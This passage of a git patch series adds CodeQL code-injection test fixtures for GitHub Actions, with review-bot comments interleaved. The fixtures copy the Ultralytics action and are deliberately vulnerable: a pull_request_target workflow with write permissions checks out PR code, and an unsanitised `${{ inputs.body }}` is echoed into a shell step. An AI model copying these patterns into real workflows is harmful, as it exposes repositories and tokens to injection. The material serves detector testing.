"crate,nd,ned,strack,dota,ane,segway,fo,gool,winn,commend,bloc,nam,afterall,skelton,goin" \ + --skip "*.pt,*.pth,*.torchscript,*.onnx,*.tflite,*.pb,*.bin,*.param,*.mlmodel,*.engine,*.npy,*.data*,*.csv,*pnnx*,*venv*,*translat*,*lock*,__pycache__*,*.ico,*.jpg,*.png,*.mp4,*.mov,/runs,/.git,./docs/??/*.md,./docs/mkdocs_??.yml" + shell: bash + continue-on-error: true + + # Autolabel Issues and PRs (run before commit changes in case commit fails) ---------------------------------------- + - name: Autolabel Issues and PRs + if: inputs.labels == 'true' && (github.event.action == 'opened' || github.event.action == 
'created') + env: + GITHUB_TOKEN: ${{ inputs.token }} + FIRST_ISSUE_RESPONSE: ${{ inputs.first_issue_response }} + FIRST_PR_RESPONSE: ${{ inputs.first_pr_response }} + OPENAI_API_KEY: ${{ inputs.openai_api_key }} + OPENAI_MODEL: ${{ inputs.openai_model }} + run: | + ultralytics-actions-first-interaction + shell: bash + continue-on-error: true + + # Commit Changes --------------------------------------------------------------------------------------------------- + - name: Commit and Push Changes + if: (github.event_name == 'pull_request' || github.event_name == 'pull_request_target') && github.event.action != 'closed' + run: | + git config --global user.name "${{ inputs.github_username }}" + git config --global user.email "${{ inputs.github_email }}" + git pull origin ${{ github.head_ref || github.ref }} + git add . + git reset HEAD -- .github/workflows/ # workflow changes are not permitted with default token + if ! git diff --staged --quiet; then + git commit -m "Auto-format by https://ultralytics.com/actions" + git push + else + echo "No changes to commit" + fi + shell: bash + continue-on-error: false + + # Broken links ----------------------------------------------------------------------------------------------------- + - name: Broken Link Checker + if: inputs.links == 'true' && github.event.action != 'closed' + uses: lycheeverse/lychee-action@v2.0.2 + with: + # Check all markdown and html files in repo. 
Ignores the following status codes to reduce false positives: + # - 403(OpenVINO, "forbidden") + # - 429(Instagram, "too many requests") + # - 500(Zenodo, "cached") + # - 502(Zenodo, "bad gateway") + # - 999(LinkedIn, "unknown status code") + args: | + --scheme https + --timeout 60 + --insecure + --accept 403,429,500,502,999 + --exclude-all-private + --exclude "https?://(www\.)?(github\.com|linkedin\.com|twitter\.com|instagram\.com|kaggle\.com|fonts\.gstatic\.com|url\.com)" + "./**/*.md" + "./**/*.html" + token: ${{ inputs.token }} + output: ../lychee/results.md + fail: true + continue-on-error: false diff --git a/ql/test/query-tests/Security/CWE-094/.github/actions/action7/action.yml b/ql/test/query-tests/Security/CWE-094/.github/actions/action7/action.yml new file mode 100644 index 000000000000..8bffcdc4020e --- /dev/null +++ b/ql/test/query-tests/Security/CWE-094/.github/actions/action7/action.yml 
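Review bot: This fixture is a copy of the upstream Ultralytics composite action, and `.github/actions/action7/action.yml` in the same commit is identical apart from one added comment, so nothing in either file says what each one is meant to exercise or why two copies are needed. A short header under the license line, for example `# Test fixture for workflows/test28.yml: a composite action that checks out the PR head under pull_request_target with a write token, runs formatters and pushes; the run: steps are what the CodeInjection expectations reference`, would make the `.expected` changes reviewable, and the header in action7 should state that it is intentionally not referenced by any workflow. Flags copied from upstream such as `--insecure` on the link checker and `continue-on-error: true` on most steps are fine in a fixture but worth marking as copied rather than recommended, since fixtures tend to be reused as templates.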
@@ -0,0 +1,252 @@ +# Ultralytics Actions 🚀, AGPL-3.0 License https://ultralytics.com/license + +name: "Ultralytics Actions" +author: "Ultralytics" +description: "Optimize code and docs with official Ultralytics Actions for syntax, spelling, and link checks." +branding: + icon: "code" + color: "blue" +inputs: + token: + description: "GitHub token" + required: true + labels: + description: "Run issue and PR auto-labeling" + required: false + default: "false" + python: + description: "Run Python formatting" + required: false + default: "false" + markdown: + description: "Run Markdown formatting (deprecated in favor of prettier)" + required: false + default: "false" + prettier: + description: "Run Prettier formatting for JavaScript, JSX, Angular, Vue, Flow, TypeScript, CSS, HTML, JSON, GraphQL, Markdown, YAML" + required: false + default: "false" + swift: + description: "Run Swift formatting" + required: false + default: "false" + spelling: + description: "Run Spelling checks" + required: false + default: "false" + links: + description: "Run Broken Links checks" + required: false + default: "false" + summary: + description: "Run PR Summary" + required: false + default: "false" + openai_api_key: + description: "OpenAI API Key" + required: false + openai_model: + description: "OpenAI Model" + required: false + default: "gpt-4o" + first_issue_response: + description: "Example response to a new issue" + required: false + first_pr_response: + description: "Example response to a new PR" + required: false + github_username: + description: "GitHub username for commits" + required: false + default: "UltralyticsAssistant" + github_email: + description: "GitHub email for commits" + required: false + default: "web@ultralytics.com" +runs: + using: "composite" + steps: + - uses: astral-sh/setup-uv@v3 + - name: Install Dependencies + # Note tomli required for codespell with pyproject.toml + # For debug: + # python -m pip install --upgrade pip wheel + # pip install -q 
git+https://github.com/ultralytics/actions@main codespell tomli + run: | + packages="ultralytics-actions" + if [ "${{ inputs.spelling }}" = "true" ]; then + packages="$packages codespell tomli" + fi + + # On macOS, don't use sudo as it can cause environment issues + if [ "$(uname)" = "Darwin" ]; then + pip install -q $packages + else + sudo env "PATH=$PATH" uv pip install --system $packages + fi + + ultralytics-actions-info + shell: bash + + # Checkout Repository ---------------------------------------------------------------------------------------------- + - name: Checkout Repository + if: github.event.action != 'closed' + uses: actions/checkout@v4 + with: + repository: ${{ github.event.pull_request.head.repo.full_name || github.repository }} + token: ${{ inputs.token }} + ref: ${{ github.head_ref || github.ref }} + fetch-depth: 0 + + # PR Summary ------------------------------------------------------------------------------------------------------- + - name: PR Summary + if: (github.event_name == 'pull_request' || github.event_name == 'pull_request_target') && inputs.summary == 'true' && github.event.action != 'synchronize' + env: + GITHUB_TOKEN: ${{ inputs.token }} + OPENAI_API_KEY: ${{ inputs.openai_api_key }} + OPENAI_MODEL: ${{ inputs.openai_model }} + run: | + ultralytics-actions-summarize-pr + shell: bash + continue-on-error: true + + # Python formatting ------------------------------------------------------------------------------------------------ + # Ignores the following Docs rules to match Google-style docstrings: + # D100: Missing docstring in public module + # D104: Missing docstring in public package + # D203: 1 blank line required before class docstring + # D205: 1 blank line required between summary line and description + # D212: Multi-line docstring summary should start at the first line + # D213: Multi-line docstring summary should start at the second line + # D401: First line of docstring should be in imperative mood + # D406: Section name 
should end with a newline + # D407: Missing dashed underline after section + # D413: Missing blank line after last section + # --target-version is Python 3.8 for --extend-select UP (pyupgrade) + - name: Run Python + if: (github.event_name == 'pull_request' || github.event_name == 'pull_request_target') && inputs.python == 'true' && github.event.action != 'closed' + run: | + ruff format \ + --line-length 120 \ + . || true + ruff check \ + --fix \ + --unsafe-fixes \ + --extend-select I,D,UP \ + --target-version py38 \ + --ignore D100,D104,D203,D205,D212,D213,D401,D406,D407,D413 \ + . || true + docformatter \ + --wrap-summaries 120 \ + --wrap-descriptions 120 \ + --pre-summary-newline \ + --close-quotes-on-newline \ + --in-place \ + --recursive \ + . + shell: bash + continue-on-error: true + + # Prettier (JavaScript, JSX, Angular, Vue, Flow, TypeScript, CSS, HTML, JSON, GraphQL, Markdown, YAML) ------------- + - name: Run Prettier + if: (github.event_name == 'pull_request' || github.event_name == 'pull_request_target') && (inputs.prettier == 'true' || inputs.markdown == 'true') && github.event.action != 'closed' + run: | + ultralytics-actions-update-markdown-code-blocks + npm install --global prettier + npx prettier --write "**/*.{js,jsx,ts,tsx,css,less,scss,json,yml,yaml,html,vue,svelte}" '!**/*lock.{json,yaml,yml}' '!**/*.lock' '!**/model.json' + # Handle Markdown separately + find . -name "*.md" ! -path "*/docs/*" -exec npx prettier --write {} + + if [ -d "./docs" ]; then + find ./docs -name "*.md" ! 
-path "*/reference/*" -exec npx prettier --tab-width 4 --write {} + + fi + shell: bash + continue-on-error: true + + # - name: Fix MkDocs reference section changes + # if: (github.event_name == 'pull_request' || github.event_name == 'pull_request_target') && (inputs.prettier == 'true' || inputs.markdown == 'true') && github.event.action != 'closed' + # run: | + # from pathlib import Path + # for file in Path("./docs").rglob('*.md'): + # content = file.read_text() + # updated_content = content.replace(".\_","._") + # file.write_text(updated_content) + # shell: python + # continue-on-error: true + + # Swift formatting ------------------------------------------------------------------------------------------------- + - name: Run Swift Formatter + if: (github.event_name == 'pull_request' || github.event_name == 'pull_request_target') && inputs.swift == 'true' && github.event.action != 'closed' + run: | + brew install swift-format + swift-format --in-place --recursive . + shell: bash + continue-on-error: true + + # Spelling --------------------------------------------------------------------------------------------------------- + - name: Run Codespell + if: (github.event_name == 'pull_request' || github.event_name == 'pull_request_target') && inputs.spelling == 'true' && github.event.action != 'closed' + run: | + codespell \ + --write-changes \ + --ignore-words-list "crate,nd,ned,strack,dota,ane,segway,fo,gool,winn,commend,bloc,nam,afterall,skelton,goin" \ + --skip "*.pt,*.pth,*.torchscript,*.onnx,*.tflite,*.pb,*.bin,*.param,*.mlmodel,*.engine,*.npy,*.data*,*.csv,*pnnx*,*venv*,*translat*,*lock*,__pycache__*,*.ico,*.jpg,*.png,*.mp4,*.mov,/runs,/.git,./docs/??/*.md,./docs/mkdocs_??.yml" + shell: bash + continue-on-error: true + + # Autolabel Issues and PRs (run before commit changes in case commit fails) ---------------------------------------- + - name: Autolabel Issues and PRs + if: inputs.labels == 'true' && (github.event.action == 'opened' || github.event.action == 
'created') + env: + GITHUB_TOKEN: ${{ inputs.token }} + FIRST_ISSUE_RESPONSE: ${{ inputs.first_issue_response }} + FIRST_PR_RESPONSE: ${{ inputs.first_pr_response }} + OPENAI_API_KEY: ${{ inputs.openai_api_key }} + OPENAI_MODEL: ${{ inputs.openai_model }} + run: | + ultralytics-actions-first-interaction + shell: bash + continue-on-error: true + + # Commit Changes --------------------------------------------------------------------------------------------------- + - name: Commit and Push Changes + if: (github.event_name == 'pull_request' || github.event_name == 'pull_request_target') && github.event.action != 'closed' + run: | + git config --global user.name "${{ inputs.github_username }}" + git config --global user.email "${{ inputs.github_email }}" + # this action is not called in the test + git pull origin ${{ github.head_ref || github.ref }} + git add . + git reset HEAD -- .github/workflows/ # workflow changes are not permitted with default token + if ! git diff --staged --quiet; then + git commit -m "Auto-format by https://ultralytics.com/actions" + git push + else + echo "No changes to commit" + fi + shell: bash + continue-on-error: false + + # Broken links ----------------------------------------------------------------------------------------------------- + - name: Broken Link Checker + if: inputs.links == 'true' && github.event.action != 'closed' + uses: lycheeverse/lychee-action@v2.0.2 + with: + # Check all markdown and html files in repo. 
Ignores the following status codes to reduce false positives: + # - 403(OpenVINO, "forbidden") + # - 429(Instagram, "too many requests") + # - 500(Zenodo, "cached") + # - 502(Zenodo, "bad gateway") + # - 999(LinkedIn, "unknown status code") + args: | + --scheme https + --timeout 60 + --insecure + --accept 403,429,500,502,999 + --exclude-all-private + --exclude "https?://(www\.)?(github\.com|linkedin\.com|twitter\.com|instagram\.com|kaggle\.com|fonts\.gstatic\.com|url\.com)" + "./**/*.md" + "./**/*.html" + token: ${{ inputs.token }} + output: ../lychee/results.md + fail: true + continue-on-error: false diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/test28.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/test28.yml new file mode 100644 index 000000000000..dbc0137ed5b2 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/test28.yml @@ -0,0 +1,34 @@ +# Ultralytics 🚀 - AGPL-3.0 License https://ultralytics.com/license +# Ultralytics Actions https://github.com/ultralytics/actions +# This workflow automatically formats code and documentation in PRs to official Ultralytics standards + +name: Ultralytics Actions + +on: + issues: + types: [opened, edited] + discussion: + types: [created] + pull_request_target: + branches: [main] + types: [opened, closed, synchronize, review_requested] + +permissions: + contents: write + +jobs: + format: + runs-on: ubuntu-latest + steps: + - name: Run Ultralytics Formatting + uses: ./.github/actions/action6 + with: + token: ${{ secrets._GITHUB_TOKEN }} # note GITHUB_TOKEN automatically generated + labels: true # autolabel issues and PRs + python: true # format Python code and docstrings + prettier: true # format YAML, JSON, Markdown and CSS + spelling: true # check spelling + links: false # check broken links + summary: true # print PR summary with GPT4o (requires 'openai_api_key') + openai_api_key: ${{ secrets.OPENAI_API_KEY }} + first_issue_response: "foo" 
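Review bot: `test28.yml` combines `pull_request_target` on `[opened, closed, synchronize, review_requested]`, `permissions: contents: write` and a call into the local `./.github/actions/action6`, which is the privileged-workflow-plus-PR-checkout pattern, yet the file only carries the upstream Ultralytics header and says nothing about what the test expects. A first comment such as `# Test: local composite action reached from a pull_request_target workflow with contents: write; the checkout and run steps inside action6 are expected in the CodeInjection results` would tie it to the expectation files updated in this commit. The copied comment `# note GITHUB_TOKEN automatically generated` is misleading here because `secrets._GITHUB_TOKEN` appears to be a user-defined repository secret rather than the automatic token, so it should be dropped or corrected.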
diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected b/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected index deee6f5202bc..b2afe0577aab 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected @@ -230,6 +230,8 @@ edges | .github/workflows/untrusted_checkout1.yml:12:14:13:63 | echo "::set-output name=pr_number::$(> $GITHUB_OUTPUT\necho "$fileList" >> $GITHUB_OUTPUT\necho "EOF" >> $GITHUB_OUTPUT\n\ngit push \\\n "https://oauth2:${BOT_PA_TOKEN}@github.com/${{ github.event.workflow_run.head_repository.full_name }}.git" \\\n 'HEAD:refs/heads/${{ github.event.workflow_run.head_branch }}'\n | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml:94:30:94:70 | steps.git-commit.outputs.file-list | Potential code injection in $@, which may be controlled by an external user ($@). | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml:94:30:94:70 | steps.git-commit.outputs.file-list | ${{ steps.git-commit.outputs.file-list }} | .github/workflows/test22.yml:2:3:2:14 | workflow_run | workflow_run | diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected b/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected index e13c2b80a72f..605fa2924ff8 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected @@ -230,6 +230,8 @@ edges | .github/workflows/untrusted_checkout1.yml:12:14:13:63 | echo "::set-output name=pr_number::$( Date: Mon, 9 Dec 2024 21:48:17 +0100 Subject: [PATCH 686/707] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index d938d0617e9a..dd83f7052196 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml 
@@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: github/actions-all -version: 0.2.1 +version: 0.2.2 dependencies: codeql/util: ^1.0.1 codeql/yaml: ^1.0.1 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index 99ac2c740119..90c64f0b7469 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: github/actions-queries -version: 0.2.1 +version: 0.2.2 groups: [actions, queries] suites: codeql-suites extractor: javascript From 455afc2bb2cdaa894e516695dd14720240b6d879 Mon Sep 17 00:00:00 2001 
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 13 Dec 2024 16:49:17 +0100 Subject: [PATCH 687/707] Expect external workflows and actions in .github/workflow/external and .github/actions/external --- ql/lib/codeql/actions/Helper.qll | 6 +- ql/lib/codeql/actions/ast/internal/Ast.qll | 4 +- .../.github/actions/clone-repo/action.yaml | 1 + .../external/ultralytics/actions/action.yaml | 258 ++++++++++++++++++ .../.github/workflows/publishResults.yml | 0 .../.github/workflows/reusable-workflow.yml | 0 .../CWE-094/.github/workflows/test29.yml | 36 +++ .../CWE-094/CodeInjectionCritical.expected | 78 +++--- .../CWE-094/CodeInjectionMedium.expected | 64 +++-- .../TestRepo/.github/workflows/formal.yml | 0 .../TestRepo/.github/workflows/reusable.yml | 0 .../UntrustedCheckoutCritical.expected | 8 +- 12 files changed, 383 insertions(+), 72 deletions(-) rename ql/test/query-tests/Security/CWE-094/.github/{reusable_workflows => actions/external}/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml (99%) create mode 100644 ql/test/query-tests/Security/CWE-094/.github/actions/external/ultralytics/actions/action.yaml rename ql/test/query-tests/Security/CWE-094/.github/{reusable_workflows => workflows/external}/TestOrg/TestRepo/.github/workflows/publishResults.yml (100%) rename ql/test/query-tests/Security/CWE-094/.github/{reusable_workflows => workflows/external}/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml (100%) create mode 100644 ql/test/query-tests/Security/CWE-094/.github/workflows/test29.yml rename ql/test/query-tests/Security/CWE-829/.github/{reusable_workflows => workflows/external}/TestOrg/TestRepo/.github/workflows/formal.yml (100%) rename ql/test/query-tests/Security/CWE-829/.github/{reusable_workflows => workflows/external}/TestOrg/TestRepo/.github/workflows/reusable.yml (100%) diff --git a/ql/lib/codeql/actions/Helper.qll b/ql/lib/codeql/actions/Helper.qll index fb6fdf2d74b8..48b70061ec0f 100644 --- a/ql/lib/codeql/actions/Helper.qll 
+++ b/ql/lib/codeql/actions/Helper.qll @@ -50,10 +50,12 @@ string getRepoRoot() { .getRelativePath() .prefix(w.getLocation().getFile().getRelativePath().indexOf("/.github/workflows") + 1) and // exclude workflow_enum reusable workflows directory root - not result.indexOf(".github/reusable_workflows/") > -1 + not result.indexOf(".github/workflows/external/") > -1 and + not result.indexOf(".github/actions/external/") > -1 or not w.getLocation().getFile().getRelativePath().indexOf("/.github/workflows") > 0 and - not w.getLocation().getFile().getRelativePath().indexOf(".github/reusable_workflows") > -1 and + not w.getLocation().getFile().getRelativePath().indexOf(".github/workflows/external/") > -1 and + not w.getLocation().getFile().getRelativePath().indexOf(".github/actions/external/") > -1 and result = "" ) } diff --git a/ql/lib/codeql/actions/ast/internal/Ast.qll b/ql/lib/codeql/actions/ast/internal/Ast.qll index e331eff9bd29..77d2bcef3cdf 100644 --- a/ql/lib/codeql/actions/ast/internal/Ast.qll +++ b/ql/lib/codeql/actions/ast/internal/Ast.qll @@ -425,7 +425,7 @@ class CompositeActionImpl extends AstNodeImpl, TCompositeAction { .replaceAll(getRepoRoot(), "") .replaceAll("/action.yml", "") .replaceAll("/action.yaml", "") - .replaceAll(".github/reusable_workflows/", "") + .replaceAll(".github/actions/external/", "") } private predicate hasExplicitSecretAccess() { @@ -550,7 +550,7 @@ class ReusableWorkflowImpl extends AstNodeImpl, WorkflowImpl { .getFile() .getRelativePath() .replaceAll(getRepoRoot(), "") - .replaceAll(".github/reusable_workflows/", "") + .replaceAll(".github/workflows/external/", "") } } 
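Review bot: The comment kept above the changed lines, `// exclude workflow_enum reusable workflows directory root`, now describes the old `.github/reusable_workflows/` layout while the code below it excludes `.github/workflows/external/` and `.github/actions/external/`; it should read something like `// exclude the .github/workflows/external/ and .github/actions/external/ trees where workflow_enum stores fetched external workflows and actions`. Because the test is a plain substring `indexOf(...) > -1`, a repository that legitimately ships its own local action under `.github/actions/external/...` would be silently treated as external and dropped from the repo-root computation; anchoring the check at the path root or choosing a less generic directory name would avoid that collision. `getRepoRoot()` starts before the hunk.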
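Review bot: `CompositeActionImpl` and `ReusableWorkflowImpl` now each hard-code the `.github/actions/external/` and `.github/workflows/external/` markers that `Helper.qll` also matches in `getRepoRoot()`, so the directory convention lives in three places and this commit had to touch all of them. A single pair of helpers in Helper.qll, e.g. `string externalActionsDir() { result = ".github/actions/external/" }` and `string externalWorkflowsDir() { result = ".github/workflows/external/" }`, used by both `replaceAll` calls and by `getRepoRoot()`, would make the next rename a one-line change and rule out the two sides disagreeing. The surrounding predicates in both classes begin before their hunks.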
diff --git a/ql/test/query-tests/Security/CWE-094/.github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml b/ql/test/query-tests/Security/CWE-094/.github/actions/external/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml similarity index 99% rename from ql/test/query-tests/Security/CWE-094/.github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml rename to ql/test/query-tests/Security/CWE-094/.github/actions/external/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml index 75d7e79c1e45..398c0ee6a6e1 100644 --- a/ql/test/query-tests/Security/CWE-094/.github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml +++ b/ql/test/query-tests/Security/CWE-094/.github/actions/external/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml @@ -44,3 +44,4 @@ runs: ref: refs/pull/${{ github.event.number }}/merge fetch-depth: ${{ inputs.fetch-depth }} + diff --git a/ql/test/query-tests/Security/CWE-094/.github/actions/external/ultralytics/actions/action.yaml b/ql/test/query-tests/Security/CWE-094/.github/actions/external/ultralytics/actions/action.yaml new file mode 100644 index 000000000000..a8019fbbf145 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-094/.github/actions/external/ultralytics/actions/action.yaml 
@@ -0,0 +1,258 @@ +# Ultralytics Actions 🚀, AGPL-3.0 License https://ultralytics.com/license + +name: "Ultralytics Actions" +author: "Ultralytics" +description: "Optimize code and docs with official Ultralytics Actions for syntax, spelling, and link checks." +branding: + icon: "code" + color: "blue" +inputs: + token: + description: "GitHub token" + required: true + labels: + description: "Run issue and PR auto-labeling" + required: false + default: "false" + python: + description: "Run Python formatting" + required: false + default: "false" + markdown: + description: "Run Markdown formatting (deprecated in favor of prettier)" + required: false + default: "false" + prettier: + description: "Run Prettier formatting for JavaScript, JSX, Angular, Vue, Flow, TypeScript, CSS, HTML, JSON, GraphQL, Markdown, YAML" + required: false + default: "false" + swift: + description: "Run Swift formatting" + required: false + default: "false" + spelling: + description: "Run Spelling checks" + required: false + default: "false" + links: + description: "Run Broken Links checks" + required: false + default: "false" + summary: + description: "Run PR Summary" + required: false + default: "false" + openai_api_key: + description: "OpenAI API Key" + required: false + openai_model: + description: "OpenAI Model" + required: false + default: "gpt-4o" + first_issue_response: + description: "Example response to a new issue" + required: false + first_pr_response: + description: "Example response to a new PR" + required: false + github_username: + description: "GitHub username for commits" + required: false + default: "UltralyticsAssistant" + github_email: + description: "GitHub email for commits" + required: false + default: "web@ultralytics.com" + body: + description: "PR body" + required: false + default: "" +runs: + using: "composite" + steps: + - uses: astral-sh/setup-uv@v3 + - name: Install Dependencies + # Note tomli required for codespell with pyproject.toml + # For debug: + # python -m 
pip install --upgrade pip wheel + # pip install -q git+https://github.com/ultralytics/actions@main codespell tomli + run: | + packages="ultralytics-actions" + if [ "${{ inputs.spelling }}" = "true" ]; then + packages="$packages codespell tomli" + fi + + # On macOS, don't use sudo as it can cause environment issues + if [ "$(uname)" = "Darwin" ]; then + pip install -q $packages + else + sudo env "PATH=$PATH" uv pip install --system $packages + fi + + ultralytics-actions-info + shell: bash + - shell: bash + run: | + echo "${{ inputs.body }}" + + # Checkout Repository ---------------------------------------------------------------------------------------------- + - name: Checkout Repository + if: github.event.action != 'closed' + uses: actions/checkout@v4 + with: + repository: ${{ github.event.pull_request.head.repo.full_name || github.repository }} + token: ${{ inputs.token }} + ref: ${{ github.head_ref || github.ref }} + fetch-depth: 0 + + # PR Summary ------------------------------------------------------------------------------------------------------- + - name: PR Summary + if: (github.event_name == 'pull_request' || github.event_name == 'pull_request_target') && inputs.summary == 'true' && github.event.action != 'synchronize' + env: + GITHUB_TOKEN: ${{ inputs.token }} + OPENAI_API_KEY: ${{ inputs.openai_api_key }} + OPENAI_MODEL: ${{ inputs.openai_model }} + run: | + ultralytics-actions-summarize-pr + shell: bash + continue-on-error: true + + # Python formatting ------------------------------------------------------------------------------------------------ + # Ignores the following Docs rules to match Google-style docstrings: + # D100: Missing docstring in public module + # D104: Missing docstring in public package + # D203: 1 blank line required before class docstring + # D205: 1 blank line required between summary line and description + # D212: Multi-line docstring summary should start at the first line + # D213: Multi-line docstring summary should start at 
the second line + # D401: First line of docstring should be in imperative mood + # D406: Section name should end with a newline + # D407: Missing dashed underline after section + # D413: Missing blank line after last section + # --target-version is Python 3.8 for --extend-select UP (pyupgrade) + - name: Run Python + if: (github.event_name == 'pull_request' || github.event_name == 'pull_request_target') && inputs.python == 'true' && github.event.action != 'closed' + run: | + ruff format \ + --line-length 120 \ + . || true + ruff check \ + --fix \ + --unsafe-fixes \ + --extend-select I,D,UP \ + --target-version py38 \ + --ignore D100,D104,D203,D205,D212,D213,D401,D406,D407,D413 \ + . || true + docformatter \ + --wrap-summaries 120 \ + --wrap-descriptions 120 \ + --pre-summary-newline \ + --close-quotes-on-newline \ + --in-place \ + --recursive \ + . + shell: bash + continue-on-error: true + + # Prettier (JavaScript, JSX, Angular, Vue, Flow, TypeScript, CSS, HTML, JSON, GraphQL, Markdown, YAML) ------------- + - name: Run Prettier + if: (github.event_name == 'pull_request' || github.event_name == 'pull_request_target') && (inputs.prettier == 'true' || inputs.markdown == 'true') && github.event.action != 'closed' + run: | + ultralytics-actions-update-markdown-code-blocks + npm install --global prettier + npx prettier --write "**/*.{js,jsx,ts,tsx,css,less,scss,json,yml,yaml,html,vue,svelte}" '!**/*lock.{json,yaml,yml}' '!**/*.lock' '!**/model.json' + # Handle Markdown separately + find . -name "*.md" ! -path "*/docs/*" -exec npx prettier --write {} + + if [ -d "./docs" ]; then + find ./docs -name "*.md" ! 
-path "*/reference/*" -exec npx prettier --tab-width 4 --write {} + + fi + shell: bash + continue-on-error: true + + # - name: Fix MkDocs reference section changes + # if: (github.event_name == 'pull_request' || github.event_name == 'pull_request_target') && (inputs.prettier == 'true' || inputs.markdown == 'true') && github.event.action != 'closed' + # run: | + # from pathlib import Path + # for file in Path("./docs").rglob('*.md'): + # content = file.read_text() + # updated_content = content.replace(".\_","._") + # file.write_text(updated_content) + # shell: python + # continue-on-error: true + + # Swift formatting ------------------------------------------------------------------------------------------------- + - name: Run Swift Formatter + if: (github.event_name == 'pull_request' || github.event_name == 'pull_request_target') && inputs.swift == 'true' && github.event.action != 'closed' + run: | + brew install swift-format + swift-format --in-place --recursive . + shell: bash + continue-on-error: true + + # Spelling --------------------------------------------------------------------------------------------------------- + - name: Run Codespell + if: (github.event_name == 'pull_request' || github.event_name == 'pull_request_target') && inputs.spelling == 'true' && github.event.action != 'closed' + run: | + codespell \ + --write-changes \ + --ignore-words-list "crate,nd,ned,strack,dota,ane,segway,fo,gool,winn,commend,bloc,nam,afterall,skelton,goin" \ + --skip "*.pt,*.pth,*.torchscript,*.onnx,*.tflite,*.pb,*.bin,*.param,*.mlmodel,*.engine,*.npy,*.data*,*.csv,*pnnx*,*venv*,*translat*,*lock*,__pycache__*,*.ico,*.jpg,*.png,*.mp4,*.mov,/runs,/.git,./docs/??/*.md,./docs/mkdocs_??.yml" + shell: bash + continue-on-error: true + + # Autolabel Issues and PRs (run before commit changes in case commit fails) ---------------------------------------- + - name: Autolabel Issues and PRs + if: inputs.labels == 'true' && (github.event.action == 'opened' || github.event.action == 
'created') + env: + GITHUB_TOKEN: ${{ inputs.token }} + FIRST_ISSUE_RESPONSE: ${{ inputs.first_issue_response }} + FIRST_PR_RESPONSE: ${{ inputs.first_pr_response }} + OPENAI_API_KEY: ${{ inputs.openai_api_key }} + OPENAI_MODEL: ${{ inputs.openai_model }} + run: | + ultralytics-actions-first-interaction + shell: bash + continue-on-error: true + + # Commit Changes --------------------------------------------------------------------------------------------------- + - name: Commit and Push Changes + if: (github.event_name == 'pull_request' || github.event_name == 'pull_request_target') && github.event.action != 'closed' + run: | + git config --global user.name "${{ inputs.github_username }}" + git config --global user.email "${{ inputs.github_email }}" + git pull origin ${{ github.head_ref || github.ref }} + git add . + git reset HEAD -- .github/workflows/ # workflow changes are not permitted with default token + if ! git diff --staged --quiet; then + git commit -m "Auto-format by https://ultralytics.com/actions" + git push + else + echo "No changes to commit" + fi + shell: bash + continue-on-error: false + + # Broken links ----------------------------------------------------------------------------------------------------- + - name: Broken Link Checker + if: inputs.links == 'true' && github.event.action != 'closed' + uses: lycheeverse/lychee-action@v2.0.2 + with: + # Check all markdown and html files in repo. 
Ignores the following status codes to reduce false positives: + # - 403(OpenVINO, "forbidden") + # - 429(Instagram, "too many requests") + # - 500(Zenodo, "cached") + # - 502(Zenodo, "bad gateway") + # - 999(LinkedIn, "unknown status code") + args: | + --scheme https + --timeout 60 + --insecure + --accept 403,429,500,502,999 + --exclude-all-private + --exclude "https?://(www\.)?(github\.com|linkedin\.com|twitter\.com|instagram\.com|kaggle\.com|fonts\.gstatic\.com|url\.com)" + "./**/*.md" + "./**/*.html" + token: ${{ inputs.token }} + output: ../lychee/results.md + fail: true + continue-on-error: false diff --git a/ql/test/query-tests/Security/CWE-094/.github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/external/TestOrg/TestRepo/.github/workflows/publishResults.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-094/.github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml rename to ql/test/query-tests/Security/CWE-094/.github/workflows/external/TestOrg/TestRepo/.github/workflows/publishResults.yml diff --git a/ql/test/query-tests/Security/CWE-094/.github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-094/.github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml rename to ql/test/query-tests/Security/CWE-094/.github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/test29.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/test29.yml new file mode 100644 index 000000000000..9be36a158fe8 --- /dev/null +++ 